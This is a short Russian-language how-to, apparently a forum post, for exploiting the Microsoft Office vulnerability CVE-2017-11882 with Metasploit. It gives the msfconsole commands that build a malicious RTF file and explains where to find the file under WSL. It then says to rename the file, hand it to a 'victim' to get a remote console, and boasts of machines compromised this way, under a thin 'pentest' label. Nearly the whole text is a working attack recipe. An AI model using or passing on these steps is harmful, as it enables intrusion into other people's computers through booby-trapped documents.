Cve-2017-11882
adminЗагружаем msfconsole
используем
use exploit/windows/fileformat/office_ms17_11882
LHOST вводим наш локальный IP
set LHOST local.ip
exploit
получаем файлик /root/.msf4/local/msf.rtf
если все делаете на wsl то забираем его из
C:\Users\%USERNAME%\AppData\Local\Packages\KaliLinux.хрень.хрень.хрень\LocalState\rootfs\root\.msf4\local\msf.rtf
называем его как нам нравится)))
передаем жертве, в итоге получаем консолю юзверя)))
уязвимость старовата, но все же часто подходит для простого пентеста!
не одна и даже не две машины полегло после такого)